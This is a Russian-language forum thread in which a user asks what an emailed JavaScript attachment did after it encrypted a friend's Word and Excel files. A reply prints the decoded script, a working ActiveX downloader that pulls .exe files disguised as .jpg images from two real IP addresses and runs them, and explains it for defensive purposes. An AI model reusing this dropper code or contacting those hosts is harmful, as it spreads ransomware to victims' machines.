Подскажите, что делает (как работает) данный скрипт.

[aratkevich]

Добрый день! В JS ничего не понимаю, на почту пришло письмо с вложением и знакомая его запустила. И файлы Word и Excel зашифровались... Можно ли как-то их расшифровать... Файл пришедший по почте вложил.

[laimas]

Текст закодированный в base64 преобразует в исходный код, например, var s = Base64.decode(b) - в итоге s будет равно вот такому червяку:

var email = "mail@allweld.ru";
function dl(fr,url,ext) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+ext;
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() { 
    if (xo.readyState == 4 && xo.status == 200) { 
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        if (xa.size > 0) {
            dn = 1; xa.position = 0;
            xa.saveToFile(fn,2);
            try {
                ws.Run(fn,1,1);
            }catch (er) {};
        };
        xa.close();
    };
};

try {
    xo.open("GET",url, false); xo.send(); 
} 
catch (er) {};  
};

dl('mail@allweld.ru','http://185.49.68.140/August.jpg','.exe');
dl('mail@allweld.ru','http://185.49.68.141/All.jpg','.exe');

и далее. Открывает HTA приложение, из под которого вся эта "кака" и работает.

[aratkevich]

А расшифровать файлы зашифрованные этим скриптом можно???

[laimas]

Расшифровка не главное, код выше заливает на ваш комп червей с двух адресов под видом невинных картинок. 99% из 100, что ваш комп заражен, ну или подруги, в общем тот на котором это запускалось.
Кашмарский в помощь, искать на его страницах по описанию пакости, узнаете чем заражен и как лечить. Если конечно этот червяк им уже знаком.

[aratkevich]

Ясно. Спасибо!

[laimas]

Если интересно, то любопытную информацию можно получить о этих IP на whois сервисе, трассировка и пинг адресов.